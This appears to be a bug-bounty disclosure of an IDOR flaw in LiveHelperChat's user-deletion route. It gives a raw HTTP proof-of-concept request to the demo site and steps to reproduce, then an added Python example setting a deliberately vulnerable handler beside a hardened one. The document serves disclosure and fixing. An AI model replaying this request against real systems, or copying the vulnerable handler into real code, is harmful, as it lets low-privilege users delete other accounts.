huntr report 1AC267BE-3AF8-4774-89F2-77234D144D6B (khanhchauminh)
History: Jan 17, 2022 - 8:54 a.m.

in livehelperchat/livehelperchat

2022-01-17 08:54:51
khanhchauminh
www.huntr.dev
Tags: livehelperchat, vulnerability, insecure direct object reference, user deletion, authorization, security, proof of concept, impact, bug bounty

EPSS

0.001

Percentile

41.1%

Description

LiveHelperChat is vulnerable to an Insecure Direct Object Reference (IDOR) vulnerability. The system's authorization functionality does not prevent one user from deleting another user by modifying the user_id that identifies the user.

Each user has a user_id (1, 2, 3, ...). A malicious authorized user can delete any other user by changing the value of user_id in the GET request that deletes a user.

Proof of Concept

HTTP request

GET /site_admin/user/delete/3/(csfr)/6252584dffdb5fd120f461a3f36d3bf5 HTTP/1.1
Host: demo.livehelperchat.com
Connection: close
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://demo.livehelperchat.com/site_admin/user/userlist
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=n7c0ok7vbicornv5g10fc38ein

Steps to reproduce

1. Go to the user list (https://demo.livehelperchat.com/site_admin/user/userlist).
2. Click on the delete button of any user (for example, the user with user_id=3).
3. Intercept the request; it looks like /site_admin/user/delete/3/(csfr)/<csrf_value>.
4. Change the value of user_id in the request from 3 to another value (1, 2, 4, ...), provided that user_id exists in the user list.
5. Forward the request; the user with the new user_id is now deleted.

Impact

This vulnerability is capable of deleting any user in the user list.
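The root cause described above is that the delete route validates the CSRF token but never checks whether the requesting account is allowed to delete the user named in the URL. The following is an added example, not LiveHelperChat's own code: a minimal in-memory delete-user handler in the vulnerable shape beside a hardened version that authorizes the requester against the target object and writes an audit line for denied attempts. The User/Session/UserStore classes, the "admin"/"operator" roles and the status codes are all constructed for the example.

```python
"""Added example (not LiveHelperChat code): an IDOR-shaped delete-user
handler beside a hardened version that authorizes the requester.

Assumptions (hypothetical, not taken from the project):
- users live in an in-memory dict keyed by user_id
- the session carries the requesting user's id and a per-session CSRF token
- only the "admin" role may delete users, and nobody may delete themselves
"""
import hmac
import secrets
from dataclasses import dataclass, field


@dataclass
class User:
    user_id: int
    name: str
    role: str  # constructed roles for the example: "admin" or "operator"


@dataclass
class Session:
    user_id: int
    csrf_token: str = field(default_factory=lambda: secrets.token_hex(16))


class UserStore:
    def __init__(self, users):
        self.users = {u.user_id: u for u in users}
        self.audit_log = []  # lines a log pipeline could alert on

    def _csrf_ok(self, session, csrf_token):
        # constant-time compare so token checks do not leak timing
        return hmac.compare_digest(session.csrf_token, csrf_token)

    # --- vulnerable shape: only the CSRF token is checked -------------------
    def delete_user_vulnerable(self, session, target_id, csrf_token):
        """Mirrors the report: any logged-in user can delete any user_id,
        because the only check is a CSRF token the requester already holds."""
        if not self._csrf_ok(session, csrf_token):
            return 403
        if target_id not in self.users:
            return 404
        del self.users[target_id]
        return 200

    # --- hardened shape: authorize the requester against the target ---------
    def delete_user_hardened(self, session, target_id, csrf_token):
        if not self._csrf_ok(session, csrf_token):
            return 403
        requester = self.users.get(session.user_id)
        if requester is None:
            return 401
        if requester.role != "admin":
            # a non-admin hitting the delete route with a foreign user_id is
            # exactly the pattern a detection rule should flag
            self.audit_log.append(
                f"DENY delete user_id={target_id} "
                f"by user_id={requester.user_id} role={requester.role}"
            )
            return 403
        if target_id == requester.user_id:
            return 403  # refusing self-deletion keeps at least one admin
        if target_id not in self.users:
            return 404
        self.audit_log.append(
            f"ALLOW delete user_id={target_id} by user_id={requester.user_id}"
        )
        del self.users[target_id]
        return 200


def make_store():
    """Constructed sample users: one admin and two operators."""
    return UserStore([
        User(1, "admin", "admin"),
        User(2, "alice", "operator"),
        User(3, "bob", "operator"),
    ])


if __name__ == "__main__":
    store = make_store()
    alice = Session(user_id=2)
    # operator alice tries to delete bob (user_id=3) with her own CSRF token
    print("vulnerable:", store.delete_user_vulnerable(alice, 3, alice.csrf_token))
    store = make_store()
    alice = Session(user_id=2)
    print("hardened:  ", store.delete_user_hardened(alice, 3, alice.csrf_token))
    print("\n".join(store.audit_log))
```

The fix is the per-request check that ties the requester's role to the object in the URL; the CSRF token alone only proves the request came from the user's own browser session, which is true of the attacker's request as well. The DENY audit line gives operations a concrete signal to alert on.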
